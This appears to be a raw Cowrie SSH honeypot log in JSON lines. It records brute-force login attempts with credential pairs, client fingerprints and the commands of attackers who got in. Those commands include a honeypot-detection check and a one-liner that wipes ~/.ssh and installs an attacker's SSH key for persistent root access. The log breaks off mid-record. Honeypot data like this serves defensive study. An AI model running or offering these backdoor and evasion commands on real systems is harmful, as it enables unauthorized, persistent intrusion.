{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.003133Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.003887Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.006588Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.007924Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.009530Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.010477Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.011247Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.012240Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.013341Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.014420Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.session.file_download","duplicate":false,"outfile":"var/lib/cowrie/downloads/e909b14547ce05c3c53c4efd97bfdf1c6922030f2d427b1081589709bb5da89b","shasum":"e909b14547ce05c3c53c4efd97bfdf1c6922030f2d427b1081589709bb5da89b","destfile":"/dev/null","message":"Saved redir contents with SHA-256 e909b14547ce05c3c53c4efd97bfdf1c6922030f2d427b1081589709bb5da89b to var/lib/cowrie/downloads/e909b14547ce05c3c53c4efd97bfdf1c6922030f2d427b1081589709bb5da89b","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.044526Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.session.file_download","duplicate":false,"outfile":"var/lib/cowrie/downloads/3d7d611cde239b3dadc9325f162e8f973f24984373c76aff19e52822104b82a7","shasum":"3d7d611cde239b3dadc9325f162e8f973f24984373c76aff19e52822104b82a7","destfile":"/dev/null","message":"Saved redir contents with SHA-256 3d7d611cde239b3dadc9325f162e8f973f24984373c76aff19e52822104b82a7 to var/lib/cowrie/downloads/3d7d611cde239b3dadc9325f162e8f973f24984373c76aff19e52822104b82a7","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.045463Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.046124Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.047408Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole12345","message":"login attempt [nichole/nichole12345] failed","sensor":"my-vps","timestamp":"2025-08-28T15:46:19.984165Z","src_ip":"212.227.125.160","session":"0166efee387f"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:46:21.071131Z","src_ip":"212.227.125.160","session":"0166efee387f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32872,"dst_ip":"1.2.3.4","dst_port":22,"session":"64b46b86c5a5","protocol":"ssh","message":"New connection: 212.227.235.229:32872 (1.2.3.4:22) [session: 64b46b86c5a5]","sensor":"my-vps","timestamp":"2025-08-28T15:46:41.938741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:46:41.939418Z","src_ip":"212.227.235.229","session":"64b46b86c5a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:46:42.153389Z","src_ip":"212.227.235.229","session":"64b46b86c5a5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65304,"dst_ip":"1.2.3.4","dst_port":22,"session":"b06830716231","protocol":"ssh","message":"New connection: 217.72.205.35:65304 (1.2.3.4:22) [session: b06830716231]","sensor":"my-vps","timestamp":"2025-08-28T15:46:42.518487Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:46:42.519625Z","src_ip":"217.72.205.35","session":"b06830716231"}
{"eventid":"cowrie.login.failed","username":"ozzy","password":"ozzy","message":"login attempt [ozzy/ozzy] failed","sensor":"my-vps","timestamp":"2025-08-28T15:46:43.049789Z","src_ip":"212.227.235.229","session":"64b46b86c5a5"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:46:44.266307Z","src_ip":"212.227.235.229","session":"64b46b86c5a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57980,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec09e97e3845","protocol":"ssh","message":"New connection: 212.227.235.229:57980 (1.2.3.4:22) [session: ec09e97e3845]","sensor":"my-vps","timestamp":"2025-08-28T15:46:56.067804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:46:56.068804Z","src_ip":"212.227.235.229","session":"ec09e97e3845"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:46:56.383063Z","src_ip":"212.227.235.229","session":"ec09e97e3845"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345678","message":"login attempt [guest/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T15:46:57.686424Z","src_ip":"212.227.235.229","session":"ec09e97e3845"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:46:59.003976Z","src_ip":"212.227.235.229","session":"ec09e97e3845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43636,"dst_ip":"1.2.3.4","dst_port":22,"session":"2595aac4ce85","protocol":"ssh","message":"New connection: 212.227.235.229:43636 (1.2.3.4:22) [session: 2595aac4ce85]","sensor":"my-vps","timestamp":"2025-08-28T15:47:16.950901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:47:16.951765Z","src_ip":"212.227.235.229","session":"2595aac4ce85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:47:17.188399Z","src_ip":"212.227.235.229","session":"2595aac4ce85"}
{"eventid":"cowrie.login.failed","username":"luke","password":"luke","message":"login attempt [luke/luke] failed","sensor":"my-vps","timestamp":"2025-08-28T15:47:18.174321Z","src_ip":"212.227.235.229","session":"2595aac4ce85"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:47:19.413041Z","src_ip":"212.227.235.229","session":"2595aac4ce85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49950,"dst_ip":"1.2.3.4","dst_port":22,"session":"e392158e2c12","protocol":"ssh","message":"New connection: 212.227.235.229:49950 (1.2.3.4:22) [session: e392158e2c12]","sensor":"my-vps","timestamp":"2025-08-28T15:47:53.021796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:47:53.022958Z","src_ip":"212.227.235.229","session":"e392158e2c12"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:47:53.239801Z","src_ip":"212.227.235.229","session":"e392158e2c12"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"123","message":"login attempt [matrix/123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:47:54.112334Z","src_ip":"212.227.235.229","session":"e392158e2c12"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:47:55.322436Z","src_ip":"212.227.235.229","session":"e392158e2c12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44109,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3568a40c0a2","protocol":"ssh","message":"New connection: 212.227.235.229:44109 (1.2.3.4:22) [session: a3568a40c0a2]","sensor":"my-vps","timestamp":"2025-08-28T15:48:13.199743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:48:13.388683Z","src_ip":"212.227.235.229","session":"a3568a40c0a2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T15:48:13.659239Z","src_ip":"212.227.235.229","session":"a3568a40c0a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47334,"dst_ip":"1.2.3.4","dst_port":22,"session":"51b3a8022ce5","protocol":"ssh","message":"New connection: 212.227.235.229:47334 (1.2.3.4:22) [session: 51b3a8022ce5]","sensor":"my-vps","timestamp":"2025-08-28T15:48:14.168655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:48:14.169539Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:48:14.484273Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.login.success","username":"root","password":"100988!","message":"login attempt [root/100988!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:48:14.777411Z","src_ip":"212.227.235.229","session":"a3568a40c0a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:48:15.345476Z","src_ip":"212.227.235.229","session":"a3568a40c0a2"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T15:48:15.346139Z","src_ip":"212.227.235.229","session":"a3568a40c0a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:15.619133Z","src_ip":"212.227.235.229","session":"a3568a40c0a2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:15.620259Z","src_ip":"212.227.235.229","session":"a3568a40c0a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123456@","message":"login attempt [root/Root123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:48:15.786345Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:48:16.844188Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:48:16.844874Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:48:16.845723Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:17.162044Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:48:17.816704Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:48:17.817519Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:48:18.136175Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:18.137024Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47336,"dst_ip":"1.2.3.4","dst_port":22,"session":"2955d1941c0c","protocol":"ssh","message":"New connection: 212.227.235.229:47336 (1.2.3.4:22) [session: 2955d1941c0c]","sensor":"my-vps","timestamp":"2025-08-28T15:48:18.440814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:48:18.446727Z","src_ip":"212.227.235.229","session":"2955d1941c0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2